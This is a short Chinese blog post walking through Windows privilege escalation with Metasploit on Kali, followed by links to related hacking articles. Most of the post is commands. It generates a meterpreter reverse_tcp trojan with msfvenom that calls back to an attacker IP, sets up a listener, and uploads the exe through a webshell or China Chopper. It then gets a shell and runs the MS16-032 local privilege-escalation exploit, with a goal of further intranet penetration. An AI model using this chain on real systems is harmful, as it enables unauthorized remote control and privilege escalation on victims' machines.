程序员经验分享-hwhale

kali下msf提权

2023-05-16
  1. 生成木马

 

Msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.184.132 lport=4444 -f exe -o /root/Desktop/1.exe

 

  1. 配置监听程序

  Msfconsole 打开Metaploit

 

msf > use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set LHOST 192.168.184.132

Exploit

 

 

 

现在将1.exe 通过菜刀或者webshell 上次到可写目录,并且执行

这样就监听成功了  获得一个session (会话)

 

Getuid 查看主机名

 

shell 进入命令行模式

 

当然这里也可以加载exp

Exit 返回到meterpeter模式

Background 返回 multi/handler

use exploit/windows/local/ms16_032_secondary_logon_handle_privesc 加载exp

 

Session 1 返回之前的会话

Exploit 进行提权

 

这说明exp执行成功,可以进一步提权,内网渗透了

 

本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系:hwhale#tublm.com(使用前将#替换为@)

Kali

MSF

kali下msf提权 的相关文章

  • 树莓派Raspberry Pi 2B在Kali上使用TightVNCServer灰屏

    1 将 root vnc xstartup改为 span class token shebang important bin sh span unset SESSION MANAGER unset DBUS SESSION BUS ADDR

  • docker kali 安装 xfce4 桌面 + tigervnc + novnc

    docker kali 安装 xfce4 桌面 43 tigervnc 43 novnc 启动容器环境变量准备工作安装xfce4 桌面tigervnc安装 tigervnc启动 tigervnc novncxfce4 启动弹窗如何关闭 xf

  • 在 Kali Linux 中如何安装 Google Chrome

    目的 我们的目标是在 Kali Linux 上安装Google Chrome Web 浏览器 同时 xff0c 请参阅附录为可能出现的问题进行排查 要求 需要获得已安装 Kali Linux 或者 Live 系统的特权 惯例 给定命令需要以

  • linux-kali 2020.3.3 虚拟机 环境 下载安装

    一 所需环境配置文件下载 1 虚拟机 这次配置环境使用的vmware版本为15 5 0 虚拟机大家可以自行在相关微信公众号上搜索破解版 按照其上进行安装 如下图 如果需要也可以vm官方网站上进行下载相关软件 直接下载对应版本即可 vm官网链

  • Linux脏牛漏洞提权

    通过vulnhub平台搭建靶场 靶机地址 Vulnerable By Design Search lampiao VulnHub 靶机下载地址 https download vulnhub com lampiao Lampiao zip 下

  • kali2022安装冰蝎

    资源包准备 下载java8 因其客户端要求jre8 服务端 net 2 0 php 5 3 7 4 java 6 Java Archive Downloads Java SE 8 冰蝎下载地址 https github com rebeyo

  • 7、kali安装输入法

    1 安装命令 拼音 apt install ibus ibus pinyin 五笔 apt install ibus ibus table wubi 2 初始化命令 im config 3 重启系统 reboot 4 设置输入法 ibus

  • 记录一下2023.2kali的默认密码和修改root用户密码的方法

    要水一篇博客了 默认登录用户名 密码 kali kali 切换root用户 sudo su 这时输入的密码是kali 然后就切换到了root用户 输入passwd root 提示修改新密码 根据提示输入两遍新密码就修改了root用户的密码啦

  • Linux上的中文输入法安装(Ubuntu + Kali五笔拼音)

    Linux上的中文输入法安装Ubuntu Kali五笔拼音 1 输入法框架 2 输入法 3 操作系统 4 使用体验 5 安装输入法 6 输入配置 1 输入法框架 在Linux上 常见的输入法框架有三种 fcitx ibus xim 2 输入

  • 联想笔记本使用linux时不能连接WiFi

    1 每次开机不能使用无线网 输入 rfkill list 发现ideapad laptop处于blocked yes状态 使用以下命令解除锁定便可以使用wifi sudo modprobe r ideapad laptop 2 将ideap

  • 解决Kali的Firefox浏览器不能正常使用

    原因 kali网卡没有分配IP 解决办法

  • Kali Linux Armitage生成被控端和主控端

    目录 说明 使用 Armitage生成被控端和主控端 说明 按照 Kali Linux2 网络渗透测试实践指南 第二版 第八章操作 仅供学习讨论使用 请勿进行非法操作 使用 Armitage生成被控端和主控端 选中 payload 然后选择

  • Kali--MSF-永恒之蓝详解(复现、演示、远程、后门、加壳、修复)

    目录 一 永恒之蓝概述 二 SMB协议 三 准备工作 四 漏洞复现 1 主机发现 2 端口扫描 3 利用模块 五 演示功能 1 获取cmd 2 捕获屏幕 3 上传文件 4 下载文件 5 远程登录 6 上传后门 7 免杀加壳 8 运行wann

  • 网络安全与网站安全及计算机安全:如何使用Kali Linux的Rarcrack获取RAR压缩文件加密密码?

    知识点详解 1 1 Rarcrack是一款获取压缩文件密吗的软件 但是仅支持zip rar和7z三种类型 1 2 在kali操作系统中是没有此工具的 所以就必须先安装才能使用 1 3 安装Rarcrack的指令 apt install ra

  • Kali Hyper-V安装正常启动后 黑屏 只能进命令模式

    问题 Hyper V安装虚拟机Kali系统一切安装正常 没有出现错误 安装成功后重启 只能进入命令模式 tt1 tt6 进不去GUI桌面 尝试 一代二代虚拟硬盘都试过 同样问题 只能开进后进入命令模式 在命令模式下一切运行正常 也修复过系统

  • 隐秘的角落——proxychains代理工具

    互联网只因你太美 自千禧年之后影响了数十年 无数的弄潮儿和狂热者为你痴迷 也有不尽的黑子们就安全问题而争议 直到现在 HTTPS SSH SOCKS VPN IPsec等技术逐渐为大众所接受 无法割舍 而这次 我将介绍的是Kali中的代理工

  • XSS攻击实战

    一 XSS原理与分类 原理 XSS攻击全程跨站脚本攻击 恶意攻击者往Web页面里插入恶意Script代码 当用户浏览该页之时 嵌入其中Web里面的Script代码会被执行 从而达到恶意攻击用户的目的 与SQL注入类似 XSS也是利用提交恶意

  • Kali-加密文档Office破解-hashcat(字典)

    利用office2john py 导出word的hash值 office2john py YD xls gt hash txt 修改hash内容 cat hash txt gedit hash txt 破解 m 哈希值类型 hashcat

  • Kali如何配置静态IP,并且实现网络访问

    1 本地网络配置 我是使用VMware workstation的桥接网络 配置IP要根据对应的网络模式下对应的网络段进行配置 才能保证Kali与别的主机正常通信 桥接网络模式 我需要先看一下宿主机的网络IP地址 WIN r输入cmd 回车

  • 两万字带你认识黑客在kali中使用的工具

    目录 前言 一 信息收集工具 二 脆弱性分析工具 三 漏洞利用工具 四 嗅探与欺骗工具 五 密码攻击工具 六 权限提升工具 七 Web应用工具 八 无线攻击工具 九 硬件黑客工具 十 维持访问工具 十一 取证工具 十二 逆向工程工具 十三

随机推荐

热门标签